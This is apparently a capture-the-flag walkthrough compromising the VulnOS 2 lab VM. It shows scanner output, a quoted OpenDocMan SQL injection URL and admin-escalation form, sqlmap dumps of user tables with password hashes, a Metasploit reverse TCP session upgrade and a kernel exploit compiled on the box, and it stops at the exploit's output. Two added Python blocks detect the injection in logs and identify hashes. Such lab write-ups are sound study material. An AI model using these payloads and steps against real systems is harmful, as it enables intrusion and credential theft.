VulnOS: 2 Boot to Root VM Walkthrough

Introduction

Today I’ll be documenting how to fully compromise the VulnOS: 2 VM, created by @c4b3rw0lf.

This was a tough VM, centred around a Joomla web app. This was of particular interest to me as I’d never attempted to compromise a Joomla app prior to this VM.

Onwards!

NMap

root@kali:~# nmap -sV -T5 -p- -sC 192.168.56.104

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-17 10:52 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for cyberry.com (192.168.56.104)
Host is up (0.00056s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|   256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_  256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (EdDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd
MAC Address: 08:00:27:57:4F:AA (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.00 seconds

Not a lot to go on here really. Outdated OpenSSH and Linux Kernel, an Apache server and what appears to be an IRC server on port 6667!

IRC Server

Connecting to the IRC server with WeeChat yields... nothing?

11:34:24 192.168.56.104 === | ========== End of backlog (20 lines) ==========
11:34:52        weechat     |   ___       __         ______________        _____
11:34:52        weechat     |   __ |     / /___________  ____/__  /_______ __  /_
11:34:52        weechat     |   __ | /| / /_  _ \  _ \  /    __  __ \  __ `/  __/
11:34:52        weechat     |   __ |/ |/ / /  __/  __/ /___  _  / / / /_/ // /_
11:34:52        weechat     |   ____/|__/  \___/\___/\____/  /_/ /_/\__,_/ \__/
11:34:52        weechat     | WeeChat 1.9.1 [compiled on Sep 23 2017 19:47:32]
11:34:52        weechat     | - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
11:34:52        weechat     | Plugins loaded: alias, aspell, buflist, charset, exec, fifo, guile, irc, logger, lua, perl, python, relay, ruby, script, tcl, trigger, xfer
11:35:00 192.168.56.104  -- | irc: connecting to server 192.168.56.104/6667...
11:35:00 192.168.56.104  -- | irc: connected to 192.168.56.104/6667 (192.168.56.104)
11:35:00 192.168.56.104  -- | Welcome to the Internet Relay Network root!~root@192.168.56.102
11:35:00 192.168.56.104  -- | Your host is irc.example.net, running version ngircd-21 (i686/pc/linux-gnu)
11:35:00 192.168.56.104  -- | This server has been started Sat Mar 17 2018 at 11:48:40 (CET)
11:35:00 192.168.56.104  -- | irc.example.net ngircd-21 abBcCioqrRswx abehiIklmMnoOPqQrRstvVz
11:35:00 192.168.56.104  -- | RFC2812 IRCD=ngIRCd CHARSET=UTF-8 CASEMAPPING=ascii PREFIX=(qaohv)~&@%+ CHANTYPES=#&+ CHANMODES=beI,k,l,imMnOPQRstVz CHANLIMIT=#&+:10 :are supported on this server
11:35:00 192.168.56.104  -- | CHANNELLEN=50 NICKLEN=9 TOPICLEN=490 AWAYLEN=127 KICKLEN=400 MODES=5 MAXLIST=beI:50 EXCEPTS=e INVEX=I PENALTY :are supported on this server
11:35:00 192.168.56.104  -- | There are 1 users and 0 services on 1 servers
11:35:00 192.168.56.104  -- | 1 :channels formed
11:35:00 192.168.56.104  -- | I have 1 users, 0 services and 0 servers
11:35:00 192.168.56.104  -- | 1 1 :Current local users: 1, Max: 1
11:35:00 192.168.56.104  -- | 1 1 :Current global users: 1, Max: 1
11:35:00 192.168.56.104  -- | Highest connection count: 2 (8 connections received)
11:35:00 192.168.56.104  -- | - irc.example.net message of the day
11:35:00 192.168.56.104  -- | - **************************************************
11:35:00 192.168.56.104  -- | - *             H    E    L    L    O              *
11:35:00 192.168.56.104  -- | - *  This is a private irc server. Please contact  *
11:35:00 192.168.56.104  -- | - *  the admin of the server for any questions or  *
11:35:00 192.168.56.104  -- | - *  issues.                                       *
11:35:00 192.168.56.104  -- | - **************************************************
11:35:00 192.168.56.104  -- | - *  The software was provided as a package of     *
11:35:00 192.168.56.104  -- | - *  Debian GNU/Linux <http://www.debian.org/>.    *
11:35:00 192.168.56.104  -- | - *  However, Debian has no control over this      *
11:35:00 192.168.56.104  -- | - *  server.                                       *
11:35:00 192.168.56.104  -- | - **************************************************
11:35:00 192.168.56.104  -- | End of MOTD command
11:35:07 192.168.56.104  -- | You are now known as OhExFortyOne
[11:35] [1] [irc/192.168.56.104] 1:server[192.168.56.104]

Running /list shows that there are no channels, so we’ll park this for now and come back to it later if need be.

Web Server

Navigating to the webapp takes us to a splash screen saying “pwn the webapp!” and pointing us to a subdirectory named “/jabc”.

First up we run the usual barrage of tools against the app (Nikto and Dirb).

Nikto Output

root@kali:~# nikto -host http://192.168.56.104/jabc
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        80
+ Start Time:         2018-03-17 22:17:47 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /jabc/scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /jabc/robots.txt, fields: 0x619 0x53099f194b54d 
+ OSVDB-3268: /jabc/includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /jabc/includes/: This might be interesting...
+ OSVDB-3092: /jabc/misc/: This might be interesting...
+ OSVDB-3092: /jabc/scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /jabc/install.php: Drupal install.php file found.
+ OSVDB-3092: /jabc/install.php: install.php file found.
+ OSVDB-3092: /jabc/xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3268: /jabc/sites/: Directory indexing found.
+ 8383 requests: 0 error(s) and 36 item(s) reported on remote host
+ End Time:           2018-03-17 22:18:50 (GMT0) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Loads of stuff here to go through manually. Important takeaways for me are –

  • This is a Drupal app (guides vulnerability research)
  • There’s an xmlrpc.php file available
    • We may be able to leverage this to get the app to do things that it shouldn’t do.
  • /jabc/scripts/ has a potential system shell available according to Nikto

Dirb

root@kali:~# dirb http://192.168.56.104/jabc

START_TIME: Sat Mar 17 22:16:55 2018
URL_BASE: http://192.168.56.104/jabc/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.104/jabc/ ----
==> DIRECTORY: http://192.168.56.104/jabc/includes/                                                                                                                                                               
+ http://192.168.56.104/jabc/index.php (CODE:200|SIZE:9525)                                                                                                                                                       
==> DIRECTORY: http://192.168.56.104/jabc/misc/                                                                                                                                                                   
==> DIRECTORY: http://192.168.56.104/jabc/modules/                                                                                                                                                                
==> DIRECTORY: http://192.168.56.104/jabc/profiles/                                                                                                                                                               
+ http://192.168.56.104/jabc/robots.txt (CODE:200|SIZE:1561)                                                                                                                                                      
==> DIRECTORY: http://192.168.56.104/jabc/scripts/                                                                                                                                                                
==> DIRECTORY: http://192.168.56.104/jabc/sites/                                                                                                                                                                  
==> DIRECTORY: http://192.168.56.104/jabc/templates/                                                                                                                                                              
==> DIRECTORY: http://192.168.56.104/jabc/themes/                                                                                                                                                                 
+ http://192.168.56.104/jabc/xmlrpc.php (CODE:200|SIZE:42)                                                                                                                                                        
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/profiles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/sites/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.104/jabc/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sat Mar 17 22:17:04 2018
DOWNLOADED: 4612 - FOUND: 3

Nothing hugely interesting here that isn’t available in the Nikto output.

Droopescan

After Googling for things to look for when pentesting Drupal apps, I came across this awesome library on Github. Seems to operate in a similar manner to tools like Joomscan and wpscan.

root@kali:~# droopescan scan drupal -u 192.168.56.104/jabc
[+] Themes found:                                                               
    seven http://192.168.56.104/jabc/themes/seven/
    garland http://192.168.56.104/jabc/themes/garland/

[+] No interesting urls found.

[+] Possible version(s):
    7.22
    7.23
    7.24
    7.25
    7.26

[+] Plugins found:
    ctools http://192.168.56.104/jabc/sites/all/modules/ctools/
        http://192.168.56.104/jabc/sites/all/modules/ctools/CHANGELOG.txt
        http://192.168.56.104/jabc/sites/all/modules/ctools/LICENSE.txt
        http://192.168.56.104/jabc/sites/all/modules/ctools/API.txt
    views http://192.168.56.104/jabc/sites/all/modules/views/
        http://192.168.56.104/jabc/sites/all/modules/views/README.txt
        http://192.168.56.104/jabc/sites/all/modules/views/LICENSE.txt
    token http://192.168.56.104/jabc/sites/all/modules/token/
        http://192.168.56.104/jabc/sites/all/modules/token/README.txt
        http://192.168.56.104/jabc/sites/all/modules/token/LICENSE.txt
    libraries http://192.168.56.104/jabc/sites/all/modules/libraries/
        http://192.168.56.104/jabc/sites/all/modules/libraries/CHANGELOG.txt
        http://192.168.56.104/jabc/sites/all/modules/libraries/README.txt
        http://192.168.56.104/jabc/sites/all/modules/libraries/LICENSE.txt
    entity http://192.168.56.104/jabc/sites/all/modules/entity/
        http://192.168.56.104/jabc/sites/all/modules/entity/README.txt
        http://192.168.56.104/jabc/sites/all/modules/entity/LICENSE.txt
    ckeditor http://192.168.56.104/jabc/sites/all/modules/ckeditor/
        http://192.168.56.104/jabc/sites/all/modules/ckeditor/CHANGELOG.txt
        http://192.168.56.104/jabc/sites/all/modules/ckeditor/README.txt
        http://192.168.56.104/jabc/sites/all/modules/ckeditor/LICENSE.txt
    rules http://192.168.56.104/jabc/sites/all/modules/rules/
        http://192.168.56.104/jabc/sites/all/modules/rules/README.txt
        http://192.168.56.104/jabc/sites/all/modules/rules/LICENSE.txt
    addressfield http://192.168.56.104/jabc/sites/all/modules/addressfield/
        http://192.168.56.104/jabc/sites/all/modules/addressfield/LICENSE.txt
    plupload http://192.168.56.104/jabc/sites/all/modules/plupload/
        http://192.168.56.104/jabc/sites/all/modules/plupload/CHANGELOG.txt
        http://192.168.56.104/jabc/sites/all/modules/plupload/README.txt
        http://192.168.56.104/jabc/sites/all/modules/plupload/LICENSE.txt
    commerce http://192.168.56.104/jabc/sites/all/modules/commerce/
        http://192.168.56.104/jabc/sites/all/modules/commerce/README.txt
        http://192.168.56.104/jabc/sites/all/modules/commerce/LICENSE.txt
    image http://192.168.56.104/jabc/modules/image/
    profile http://192.168.56.104/jabc/modules/profile/
    php http://192.168.56.104/jabc/modules/php/

[+] Scan finished (0:00:16.751941 elapsed)

Lots of useful info here. We can use the name and README files of those modules to search for vulnerabilities 🙂 (plupload sounds like it could be interesting right?)

Manual Probing

After a few seconds of poking around the site we find an interesting Documentation page –

The ugly highlighted text was “hidden” (black text black background), it says “For a detailed view and documentation of our products please visit our documentation platform at /jabcd0cs/, just login with guest/guest”. So let’s go and do that!

OpenDocMan Pwnage

Navigating to /jabcd0cs/ takes us to this page –

So we’ve got some kind of commercial documentation management platform here, version 1.2.7... Let’s see if SearchSploit has any vulnerabilities for it –


root@kali:~# searchsploit opendocman
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenDocMan 1.2.5 - 'add.php?last_message' Cross-Site Scripting                                                                                                            | exploits/php/webapps/33295.txt
OpenDocMan 1.2.5 - 'admin.php?last_message' Cross-Site Scripting                                                                                                          | exploits/php/webapps/33298.txt
OpenDocMan 1.2.5 - 'category.php' Cross-Site Scripting                                                                                                                    | exploits/php/webapps/33299.txt
OpenDocMan 1.2.5 - 'department.php' Cross-Site Scripting                                                                                                                  | exploits/php/webapps/33300.txt
OpenDocMan 1.2.5 - 'index.php?last_message' Cross-Site Scripting                                                                                                          | exploits/php/webapps/33297.txt
OpenDocMan 1.2.5 - 'profile.php' Cross-Site Scripting                                                                                                                     | exploits/php/webapps/33301.txt
OpenDocMan 1.2.5 - 'rejects.php' Cross-Site Scripting                                                                                                                     | exploits/php/webapps/33302.txt
OpenDocMan 1.2.5 - 'search.php' Cross-Site Scripting                                                                                                                      | exploits/php/webapps/33303.txt
OpenDocMan 1.2.5 - 'toBePublished.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                      | exploits/php/webapps/33296.txt
OpenDocMan 1.2.5 - 'user.php' Cross-Site Scripting                                                                                                                        | exploits/php/webapps/33304.txt
OpenDocMan 1.2.5 - 'view_file.php' Cross-Site Scripting                                                                                                                   | exploits/php/webapps/33305.txt
OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection                                                                                                                   | exploits/php/webapps/9903.txt
OpenDocMan 1.2.6.1 - Cross-Site Request Forgery (Password Change)                                                                                                         | exploits/php/webapps/20709.html
OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting                                                                                                                      | exploits/php/webapps/25250.txt
OpenDocMan 1.2.7 - Multiple Vulnerabilities                                                                                                                               | exploits/php/webapps/32075.txt
OpenDocMan 1.3.4 - Cross-Site Request Forgery                                                                                                                             | exploits/php/webapps/39414.txt
OpenDocMan 1.x - 'out.php' Cross-Site Scripting                                                                                                                           | exploits/php/webapps/31933.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Perfect, there are vulnerabilities for our version. Let’s read that text file and see how serious they are –

------------------------------------------------------------------------
-----------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.

1) SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below displays version of the MySQL server:

http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

2) Improper Access Control in OpenDocMan: CVE-2014-1946

The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating user's profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.

The exploitation example below assigns administrative privileges for the current account:

<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>

------------------------------------------------------------------------
-----------------------
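As an added example (mine, not part of the original post or of OpenDocMan), here is a small Python scanner for the CVE-2014-1945 pattern the advisory describes: add_value is only ever supposed to be a bare table identifier such as odm_user, so the same allow-list check that flags the UNION request in an Apache access log is also the server-side validation the advisory says is missing. The log lines are constructed (line 2 carries the advisory's own example request); the sqlmap user-agent string is a made-up sample.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, enough fields captured for our purposes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# What add_value legitimately is: one bare SQL identifier (e.g. odm_user).
IDENT_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]{0,63}$')
# Keywords that never belong in an identifier; only used to label the finding.
SQL_KEYWORDS = re.compile(r'\b(UNION|SELECT|SLEEP|BENCHMARK|AND|OR|LOAD_FILE)\b', re.I)

# Constructed sample log, not taken from the original post. Line 2 is the
# public CVE-2014-1945 example request; the sqlmap user agent on line 3 is made up.
SAMPLE_LOG = """\
192.168.56.102 - - [17/Mar/2018:22:40:01 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.102 - - [17/Mar/2018:22:41:13 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 611 "-" "Mozilla/5.0"
192.168.56.102 - - [17/Mar/2018:23:09:45 +0000] "GET /jabcd0cs//ajax_udf.php?q=1&add_value=odm_user%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.2#stable (http://sqlmap.org)"
192.168.56.102 - - [17/Mar/2018:23:15:02 +0000] "POST /jabcd0cs/signup.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def classify_add_value(value):
    """Return None when value is a bare identifier, else a reason it was rejected.

    This is the allow-list check ajax_udf.php should apply before ever building
    SQL from add_value; table names cannot be bound as query parameters.
    """
    if IDENT_RE.match(value):
        return None
    m = SQL_KEYWORDS.search(value)
    if m:
        return f"SQL keyword {m.group(1).upper()} in add_value"
    return "add_value is not a bare identifier"


def scan_access_log(text):
    """Run the allow-list check over decoded ajax_udf.php requests in a log."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        if 'sqlmap' in m['ua'].lower():
            findings.append({'line': lineno, 'ip': m['ip'],
                             'reason': 'sqlmap user agent'})
        url = urlsplit(m['target'])
        path = re.sub(r'/+', '/', url.path)   # "/jabcd0cs//ajax_udf.php" too
        if not path.endswith('/ajax_udf.php'):
            continue
        # parse_qs percent-decodes, so %20UNION%20SELECT becomes readable.
        for value in parse_qs(url.query).get('add_value', []):
            reason = classify_add_value(value)
            if reason:
                findings.append({'line': lineno, 'ip': m['ip'], 'reason': reason})
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['reason']}")
```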

Great, privesc from guest to admin and a SQLi vuln. Let’s plumb that SQLi vulnerability into SQLMap first and see what happens.

root@kali:~/# sqlmap -u "192.168.56.104/jabcd0cs//ajax_udf.php?q=1&add_value=odm_user" --level 3 -D drupal7 -T users --dump
......SNIP
[00:09:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL unknown
[00:09:45] [INFO] fetching columns for table 'users' in database 'drupal7'
[00:09:45] [INFO] fetching entries for table 'users' in database 'drupal7'
Database: drupal7
Table: users
[4 entries]
+-----+---------+--------------------------+---------------------------------------------------------+--------------------------+--------------------------+---------+------------+------------+--------+---------+------------+---------------+-----------+------------+------------------+
| uid | name    | init                     | pass                                                    | mail                     | data                     | theme   | login      | access     | status | picture | created    | timezone      | signature | language   | signature_format |
+-----+---------+--------------------------+---------------------------------------------------------+--------------------------+--------------------------+---------+------------+------------+--------+---------+------------+---------------+-----------+------------+------------------+
| 0   | <blank> | <blank>                  | <blank>                                                 | <blank>                  | NULL                     | <blank> | 0          | 0          | 0      | 0       | 0          | NULL          | <blank>   | <blank>    | NULL             |
| 1   | webmin  | VulnOSv2@localdomain.com | $S$DPc41p2JwLXR6vgPCi.jC7WnRMkw3Zge3pVoJFnOn6gfMfsOr/Ug | VulnOSv2@localdomain.com | b:0;                     | <blank> | 1462351302 | 1462351302 | 1      | 0       | 1460812762 | Europe/Berlin | <blank>   | <blank>    | NULL             |
| 14  | admin   | admin@admin.com          | $S$DIrs/bRU3.0G7ctTTNNcwx4.Elkt5C2HSesdlQ.O0/wMGR7hwqAO | admin@admin.com          | a:1:{s:7:"contact";i:1;} | <blank> | 0          | 0          | 0      | 0       | 1521288471 | Europe/Berlin | <blank>   | <blank>    | filtered_html    |
| 15  | test    | test@test.com            | $S$DhT7/11SdhkG16nRHvZ8OMkJUXI2Utek2YuNn1v9IABRmcGzHY37 | test@test.com            | a:1:{s:7:"contact";i:1;} | <blank> | 0          | 0          | 0      | 0       | 1521329907 | Europe/Berlin | <blank>   | <blank>    | filtered_html    |
+-----+---------+--------------------------+---------------------------------------------------------+--------------------------+--------------------------+---------+------------+------------+--------+---------+------------+---------------+-----------+------------+------------------+

[00:09:45] [INFO] table 'drupal7.users' dumped to CSV file '/root/.sqlmap/output/192.168.56.104/dump/drupal7/users.csv'
[00:09:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.104'

Sadly that’s a salted SHA512 hash... We’re not going to be able to crack that. Let’s try and get the admin user’s credentials from the jabcd0cs tables instead –

root@kali:~/.sqlmap/output/192.168.56.104/dump/drupal7# sqlmap -u "192.168.56.104/jabcd0cs//ajax_udf.php?q=1&add_value=odm_user" --level 3 -D jabcd0cs -T odm_user --dump
[00:53:12] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
Database: jabcd0cs                                                                                                                                                                                                
Table: odm_user
[2 entries]
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| id | phone       | Email              | username | password                                 | last_name | first_name | department | pw_reset_code |
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+
| 1  | 5555551212  | webmin@example.com | webmin   | b78aae356709f8c31118ea613980954b         | min       | web        | 2          | <blank>       |
| 2  | 555 5555555 | guest@example.com  | guest    | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest     | guest      | 2          | NULL          |
+----+-------------+--------------------+----------+------------------------------------------+-----------+------------+------------+---------------+

That’s more like it. Basic MD5 hash. Let’s pop it in Crackstation and see what comes out –

Success, we’ve got a password for the webmin user now. Trying the password on the main Drupal blog didn’t work, but trying it as SSH password for user webmin did work!
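Added example (my own code, not the post's, Drupal's or OpenDocMan's) showing why the two dumps above behave so differently under cracking: the odm_user password column is unsalted MD5 (sqlmap itself annotated the guest row), while Drupal 7's $S$ format is a salted SHA-512 iterated 2^N times, with N encoded in the fourth character. The two hash values are copied from the dumps; the salt and password in the self-check are constructed.

```python
import hashlib
import hmac
import re

# Drupal 7 / phpass alphabet; the character after "$S$" is the log2 iteration count.
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
DRUPAL_HASH_LENGTH = 55

# Values copied from the two sqlmap dumps in the post.
GUEST_MD5 = '084e0343a0486ff05530df6c705c8bb4'
WEBMIN_DRUPAL = '$S$DPc41p2JwLXR6vgPCi.jC7WnRMkw3Zge3pVoJFnOn6gfMfsOr/Ug'


def identify_hash(stored):
    """Rough format triage for a dumped password column."""
    if stored.startswith('$S$') and len(stored) == DRUPAL_HASH_LENGTH:
        return 'drupal7-sha512'
    if re.fullmatch(r'[0-9a-f]{32}', stored):
        return 'unsalted-md5'
    return 'unknown'


def drupal7_cost(stored):
    """(log2 iterations, iterations, salt) encoded in the first 12 chars of a $S$ hash."""
    count_log2 = ITOA64.index(stored[3])
    return count_log2, 1 << count_log2, stored[4:12]


def md5_matches(stored, candidate):
    """One unsalted MD5 per guess and no salt: a precomputed table answers this."""
    digest = hashlib.md5(candidate.encode()).hexdigest()
    return hmac.compare_digest(digest, stored)


def _password_base64_encode(data, count):
    """Port of Drupal's _password_base64_encode (phpass-style, not RFC 4648)."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)


def drupal7_crypt(password, setting):
    """Port of Drupal 7's _password_crypt('sha512', ...): salted, 2^N rounds."""
    setting = setting[:12]
    if setting[0] != '$' or setting[2] != '$':
        raise ValueError('not a Drupal 7 setting string')
    _, count, salt = drupal7_cost(setting)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(count):                  # PHP: do { ... } while (--$count)
        digest = hashlib.sha512(digest + pw).digest()
    output = setting + _password_base64_encode(digest, len(digest))
    return output[:DRUPAL_HASH_LENGTH]


def drupal7_verify(password, stored):
    """Drupal 7's user_check_password for $S$ rows: recompute with the stored setting."""
    return hmac.compare_digest(drupal7_crypt(password, stored), stored)


if __name__ == '__main__':
    print(identify_hash(GUEST_MD5), 'guest ->', md5_matches(GUEST_MD5, 'guest'))
    log2, rounds, salt = drupal7_cost(WEBMIN_DRUPAL)
    print(identify_hash(WEBMIN_DRUPAL), f'2^{log2} = {rounds} SHA-512 rounds, salt {salt}')
```

The asymmetry is the whole story of this section: every guess against the webmin row costs 32768 SHA-512 rounds and must be repeated per salt, whereas the odm_user row costs one MD5 and is answered by a lookup table.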

root@kali:~/# ssh webmin@192.168.56.104

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Mar 17 23:13:30 CET 2018

  System load: 0.48              Memory usage: 3%   Processes:       64
  Usage of /:  5.8% of 29.91GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Wed May  4 10:41:07 2016
$ whoami
webmin
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
$ 

Privilege Escalation

So running uname -a on the box to get the Kernel version pointed me at this exploit, which appears to have a Metasploit module!

So I ran the SSH_login Metasploit module to get a session then upgraded it to a Meterpreter with sessions -u 2 which gets us to a point where we can run the kernel exploit!

msf auxiliary(scanner/ssh/ssh_login) > sessions -u 2
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.102:4433 
[*] Sending stage (857352 bytes) to 192.168.56.104
[*] Meterpreter session 3 opened (192.168.56.102:4433 -> 192.168.56.104:52158) at 2018-03-18 01:08:14 +0000

But sadly executing the exploit through Metasploit failed. No idea why! I then tried pulling down the same exploit as a C file from this awesome repo on Github and manually compiled it on the box aaaand….

webmin@VulnOSv2:/tmp$ vim sploit.c
webmin@VulnOSv2:/tmp$ gcc sploit.c -o sploit
webmin@VulnOSv2:/tmp$ ./sploit 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
